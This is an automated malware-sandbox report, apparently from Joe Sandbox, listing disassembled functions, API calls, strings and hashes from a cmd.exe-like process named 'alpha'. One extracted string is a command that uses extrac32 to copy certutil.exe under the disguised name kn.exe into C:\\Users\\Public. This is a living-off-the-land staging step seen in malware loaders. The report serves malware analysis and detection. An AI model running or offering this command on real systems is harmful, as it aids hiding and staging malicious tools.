                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                      • String ID:
                                      • API String ID: 1051989028-0
                                      • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                      • Instruction ID: 63fe2ac5295f5ba1c428929941c264703ae4b839406ec43e412e0e08a5294a85
                                      • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                      • Instruction Fuzzy Hash: 4A0273BBA0878781EB24AF15E40027ABBA1FB45F98F984635DA8E07794DF7CD4418720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$_wcsicmp$AllocProcess
                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                      • API String ID: 3223794493-3086019870
                                      • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                      • Instruction ID: a23ddf87c2a92a25503956f8c4780e9105f9a88ccf1d372a7933706ae566c492
                                      • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                      • Instruction Fuzzy Hash: EB5181ABA08B4386EA55AB15E810179BBA0FF49F58FDC9534C95E473A0DF7CE441C720
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                      • API String ID: 0-3124875276
                                      • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                      • Instruction ID: 4014cd719c9b754c5a65d1e84afba2d2a552b3811682f965dbfa9452e7cc782b
                                      • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                      • Instruction Fuzzy Hash: 9E519EABA0C64381FB54BF60A4502B9E7A4AF45F5DFC89035C64E862A4DF7CA805C370
                                      APIs
                                        • Part of subcall function 00007FF755CB58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF755CCC6DB), ref: 00007FF755CB58EF
                                        • Part of subcall function 00007FF755CB081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF755CB084E
                                      • towupper.MSVCRT ref: 00007FF755CCC1C9
                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CCC31C
                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF755CCC5CB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                      • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                      • API String ID: 2242554020-619615743
                                      • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                      • Instruction ID: f66c61354dadd765d45d07347a58caae6fee67f9e2fe540d74efb676840994bc
                                      • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                      • Instruction Fuzzy Hash: 0B1281ABA0864381EA60BB15A45417AE7A0EF44FA8FD86235D97E437E0DF3CE541D720
                                      APIs
                                      • memset.MSVCRT ref: 00007FF755CB7013
                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CB7123
                                        • Part of subcall function 00007FF755CB1EA0: wcschr.MSVCRT(?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF755CD0D54), ref: 00007FF755CB1EB3
                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB706E
                                      • wcsncmp.MSVCRT ref: 00007FF755CB70A5
                                      • wcsstr.MSVCRT ref: 00007FF755CBF9DB
                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CBFA00
                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CBFA5F
                                        • Part of subcall function 00007FF755CB823C: FindFirstFileExW.KERNELBASE ref: 00007FF755CB8280
                                        • Part of subcall function 00007FF755CB823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CB829D
                                        • Part of subcall function 00007FF755CB3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF755CCEAC5,?,?,?,00007FF755CCE925,?,?,?,?,00007FF755CAB9B1), ref: 00007FF755CB3A56
                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CBFA3D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                      • String ID: \\.\
                                      • API String ID: 799470305-2900601889
                                      • Opcode ID: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                      • Instruction ID: 1615e8232e7405270827d3ee132d924cd4a876c5bb326428a175fe0ed80f1114
                                      • Opcode Fuzzy Hash: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                      • Instruction Fuzzy Hash: FF5195BBA08A8385EB60AF1198002B9B7A4FB85F68FCD4535DE4E47794DF3CD9458320
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                      • String ID:
                                      • API String ID: 1944892715-0
                                      • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                      • Instruction ID: 5d532a687fc6627fc069f5530099d134c135ccace16020547bad048ababe5d8b
                                      • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                      • Instruction Fuzzy Hash: 55B15EBBA0964386EA64BB11E854179EAA0FF45F9CFCC8535CA4E47391DE7CE840C720
                                      APIs
                                        • Part of subcall function 00007FF755CB3578: _get_osfhandle.MSVCRT ref: 00007FF755CB3584
                                        • Part of subcall function 00007FF755CB3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB359C
                                        • Part of subcall function 00007FF755CB3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35C3
                                        • Part of subcall function 00007FF755CB3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35D9
                                        • Part of subcall function 00007FF755CB3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35ED
                                        • Part of subcall function 00007FF755CB3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB3602
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CA54DE
                                      • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF755CA1F7D), ref: 00007FF755CA552B
                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF755CA1F7D), ref: 00007FF755CA554F
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CC345F
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF755CA1F7D), ref: 00007FF755CC347E
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF755CA1F7D), ref: 00007FF755CC34C3
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CC34DB
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF755CA1F7D), ref: 00007FF755CC34FA
                                        • Part of subcall function 00007FF755CB36EC: _get_osfhandle.MSVCRT ref: 00007FF755CB3715
                                        • Part of subcall function 00007FF755CB36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF755CB3770
                                        • Part of subcall function 00007FF755CB36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB3791
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                      • String ID:
                                      • API String ID: 1356649289-0
                                      • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                      • Instruction ID: aa9101d8252a70c8fcdbe3cfa10c5d0247c477928fd359ec59e2386656d8533a
                                      • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                      • Instruction Fuzzy Hash: 2F917FBBA0864387EA54AF21E400179FAE1FB88F99F8C9535DA5E47790DF3CD4408B20
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: LocalTime$ErrorLast_get_osfhandle
                                      • String ID: %s$/-.$:
                                      • API String ID: 1644023181-879152773
                                      • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                      • Instruction ID: fdda612b7bf8bffc6e77382479fc40c05c868aa9cc8fe6cef8ef02a5e765e1ac
                                      • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                      • Instruction Fuzzy Hash: 5191B3ABA0864391EF50EB60D4502BAE7A0FF84F98FCC5535DA5E46AD4EE3CE545C320
                                      APIs
                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF755CC7251), ref: 00007FF755CC628E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ObjectSingleWait
                                      • String ID: wil
                                      • API String ID: 24740636-1589926490
                                      • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                      • Instruction ID: 03437a66a8acd2bce4762e13df1192df704aa7fc8dad580e00d8969e96cbdbdc
                                      • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                      • Instruction Fuzzy Hash: E74165A7A0854383F3606B19E600279E6A1EF85F89FDCB131D92A866D4DF3DD4858721
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                      • String ID: $Application$System
                                      • API String ID: 3377411628-1881496484
                                      • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                      • Instruction ID: ab197a323cc7e12abb754876e8281fa1112d39817f11ece256173a8ba0d56807
                                      • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                      • Instruction Fuzzy Hash: FB4159B7B04B429AE750AB60E4403EDB7B5FB89B4CF885135DA4E42B98EF38D145C750
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                      • String ID: :$\
                                      • API String ID: 3961617410-1166558509
                                      • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                      • Instruction ID: 2d70249dd6e8c791c133ff8d7d58a17dcf73c492ac13172cd65e8223d37ac470
                                      • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                      • Instruction Fuzzy Hash: B12192BBA08A8386E7506B60E454079FAA1FF89F99BCC8531D91F87790DF3CD8458620
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryDriveFullNamePathTypememset
                                      • String ID:
                                      • API String ID: 1397130798-0
                                      • Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                      • Instruction ID: bdde95152f835d40aaff380730d1de1142978b60f73817196d03b702b7c1d0d1
                                      • Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                      • Instruction Fuzzy Hash: 5091A6ABA0878386EB65AB11D8402B9F7E1FB44F98FC88135D94D47B94DF3DD9408320
                                      APIs
                                        • Part of subcall function 00007FF755CB06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06D6
                                        • Part of subcall function 00007FF755CB06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06F0
                                        • Part of subcall function 00007FF755CB06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB074D
                                        • Part of subcall function 00007FF755CB06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB0762
                                      • _wcsicmp.MSVCRT ref: 00007FF755CB25CA
                                      • _wcsicmp.MSVCRT ref: 00007FF755CB25E8
                                      • _wcsicmp.MSVCRT ref: 00007FF755CB260F
                                      • _wcsicmp.MSVCRT ref: 00007FF755CB2636
                                      • _wcsicmp.MSVCRT ref: 00007FF755CB2650
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$Heap$AllocProcess
                                      • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                      • API String ID: 3407644289-1668778490
                                      • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                      • Instruction ID: de08281ef0f2df058a4d1a9c3b1923d3887b825842d13a9c988f9a23790f9b3e
                                      • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                      • Instruction Fuzzy Hash: A6318DABA0854381FB507F61E811379E6A4EF85F98FCC8435DA4E862A5DE7CE801C731
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                      • String ID: &()[]{}^=;!%'+,`~
                                      • API String ID: 2516562204-381716982
                                      • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                      • Instruction ID: e273587027f887b2074786c882edfcecfc90a76e2e22cb30eec507e15773f148
                                      • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                      • Instruction Fuzzy Hash: 62C1B1BBA0469286E790AF25E8402BDBBA0FB44F98F985135DE8D53B94DF3CE451C710
                                      APIs
                                        • Part of subcall function 00007FF755CAD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD46E
                                        • Part of subcall function 00007FF755CAD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD485
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD4EE
                                        • Part of subcall function 00007FF755CAD3F0: iswspace.MSVCRT ref: 00007FF755CAD54D
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD569
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD58C
                                      • iswspace.MSVCRT ref: 00007FF755CB7EEE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                      • String ID: A
                                      • API String ID: 3731854180-3554254475
                                      • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                      • Instruction ID: 3c216d41d7fc8304a0a2ba7fe591fadd040aa1ba45b88cfcb13da35294e04138
